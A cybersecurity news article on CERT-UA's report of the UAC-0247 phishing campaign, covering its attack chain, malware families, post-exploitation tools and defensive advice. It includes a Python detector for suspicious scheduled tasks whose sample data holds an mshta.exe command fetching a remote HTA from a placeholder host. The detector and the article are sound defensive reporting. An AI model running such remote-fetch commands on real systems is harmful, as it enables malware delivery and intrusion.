A new wave of highly targeted cyberattacks is putting hospitals, local governments, and even defense-linked operators at risk by leveraging deception, advanced malware, and stealthy persistence techniques.
According to insights published by Ukraine’s national cyber response team CERT-UA, the threat cluster tracked as UAC-0247 has intensified operations between March and April 2026, signaling a dangerous evolution in socially engineered cyber warfare.
The campaign begins innocently enough: an email discussing humanitarian aid. But behind the façade lies a carefully orchestrated attack chain designed to infiltrate critical institutions.
Attackers lure victims into clicking malicious links, often backed by AI-generated fake websites or scripts injected into legitimate – but vulnerable – web platforms via Cross-Site Scripting. Once clicked, victims unknowingly download weaponized archives containing shortcut files that trigger multi-stage malware execution.
This isn’t opportunistic cybercrime: it’s targeted, persistent, and engineered for deep system compromise.
Inside the Attack Chain: A Technical Breakdown
The infection process reflects a high level of sophistication:
- Initial Payload: Malicious .LNK files trigger execution via native Windows tools like mshta.exe
- Stage Execution: Remote HTA files deploy decoy forms while silently installing malware
- Persistence: Scheduled tasks ensure repeated execution and system foothold
- Payload Delivery:
- AGINGFLY – Remote control, keylogging, file exfiltration
- SILENTLOOP – Dynamic C2 communication via Telegram
- RAVENSHELL – Encrypted command execution channel
What makes this campaign particularly dangerous is the modular execution model: attackers dynamically compile malicious code on infected systems, reducing detection by traditional security tools.
Expanding Targets: From Hospitals to FPV Operators
While early attacks focused on healthcare institutions and municipal authorities, newer incidents reveal expansion toward defense-related personnel, including drone (FPV) operators.
In one case, attackers distributed a trojanized version of a tool named “BACHU” via the messaging platform Signal. Using DLL side-loading, the malware silently deployed AGINGFLY—turning trusted software into a cyber weapon.
Post-Exploitation Capabilities
Once inside a network, attackers move quickly:
- Credential theft from browsers using tools like CHROMELEVATOR
- Data extraction from messaging platforms like WhatsApp (via ZAPIXDESK)
- Network reconnaissance using tools such as RUSTSCAN
- Lateral movement and tunneling using LIGOLO-NG and CHISEL
- Even cryptomining activity via XMRIG, disguised within legitimate software like WireGuard
This blend of espionage, persistence, and monetization highlights a hybrid threat model.
Global Implications
Although the campaign is regionally focused, its tactics are globally relevant. The abuse of humanitarian narratives, combined with living-off-the-land techniques and AI-generated deception, signals a broader shift in cyberattack strategies.
Organizations worldwide—especially in healthcare, government, and critical infrastructure—should treat this as a warning.
10 Critical Security Recommendations
To defend against campaigns like UAC-0247, security teams should act immediately:
- Block execution of LNK, HTA, and JS files across endpoints
- Restrict use of native tools like mshta.exe, powershell.exe, and wscript.exe
- Deploy advanced email filtering to detect phishing and spoofed domains
- Implement endpoint detection & response (EDR) solutions
- Monitor abnormal scheduled task creation
- Enforce least privilege access across systems
- Inspect outbound traffic for unusual encrypted connections
- Use threat intelligence feeds to block known indicators (IOCs)
- Regularly patch systems to prevent XSS and web-based exploits
- Conduct continuous employee awareness training via Saintynet Cybersecurity
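The attack chain above (LNK → mshta.exe → remote HTA, then a scheduled task for persistence) and the recommendations to restrict native tools and monitor scheduled task creation can be turned into a concrete check. The following is an added example, not code from CERT-UA or this article: it parses the Task Scheduler XML that Windows Security event 4698 carries in its TaskContent field and flags tasks whose actions launch a watched native binary or fetch remote content. The watchlist, the task names and the sample records are constructed for illustration.

```python
import xml.etree.ElementTree as ET

# Task Scheduler definition namespace (the XML inside event 4698's TaskContent field)
TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Native Windows binaries the campaign is reported to abuse (assumed watchlist)
WATCHED_BINARIES = {"mshta.exe", "powershell.exe", "wscript.exe"}


def task_action_findings(task_content: str) -> list[str]:
    """Return one reason per suspicious trait found in a task's <Exec> actions."""
    root = ET.fromstring(task_content)
    findings = []
    for exec_node in root.findall(".//t:Actions/t:Exec", TASK_NS):
        command = exec_node.findtext("t:Command", default="", namespaces=TASK_NS)
        arguments = exec_node.findtext("t:Arguments", default="", namespaces=TASK_NS)
        # Normalise the binary name: drop quotes, path and case before matching
        binary = command.strip().strip('"').replace("\\", "/").rsplit("/", 1)[-1].lower()
        if binary in WATCHED_BINARIES:
            findings.append(f"action runs {binary}")
        # Remote HTA/script staging shows up as a URL in the arguments
        if "http://" in arguments.lower() or "https://" in arguments.lower():
            findings.append(f"{binary} fetches remote content: {arguments.strip()}")
    return findings


def triage_task_events(events: list[dict]) -> list[dict]:
    """Run the check over 4698-style records and keep only the ones worth an analyst's time."""
    alerts = []
    for event in events:
        reasons = task_action_findings(event["TaskContent"])
        if reasons:
            alerts.append({"task": event["TaskName"], "reasons": reasons})
    return alerts


# Constructed sample records mimicking the TaskName/TaskContent fields of event 4698
SAMPLE_EVENTS = [
    {"TaskName": r"\Microsoft\Windows\Defrag\ScheduledDefrag",
     "TaskContent": (
         '<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">'
         "<Actions><Exec><Command>%windir%\\system32\\defrag.exe</Command>"
         "<Arguments>-c -h -o -$</Arguments></Exec></Actions></Task>")},
    {"TaskName": r"\OneDriveUpdate",
     "TaskContent": (
         '<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">'
         "<Actions><Exec><Command>C:\\Windows\\System32\\mshta.exe</Command>"
         "<Arguments>https://example.invalid/aid-form.hta</Arguments></Exec></Actions></Task>")},
]

if __name__ == "__main__":
    for alert in triage_task_events(SAMPLE_EVENTS):
        print(alert["task"], "->", "; ".join(alert["reasons"]))
```

In production the TaskContent string would come from the Security log (for example via Get-WinEvent on the collector), and the benign task should produce no alert while the mshta.exe task is flagged on both counts.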
For deeper protection strategies, explore enterprise-grade solutions at Saintynet Cybersecurity and stay updated with threat intelligence insights on Cybercory.
Expert Insight
This campaign demonstrates how attackers are blending social engineering, legitimate tools, and modular malware to evade detection. The use of Telegram for command-and-control and dynamic payload compilation suggests a move toward resilient, adaptive cyber operations.
Conclusion
The UAC-0247 campaign is a stark reminder that modern cyber threats are no longer just technical: they are psychological, strategic, and deeply deceptive. By exploiting trust, especially in humanitarian contexts, attackers are raising the stakes.
Organizations must respond with equal sophistication, combining technology, awareness, and proactive defense.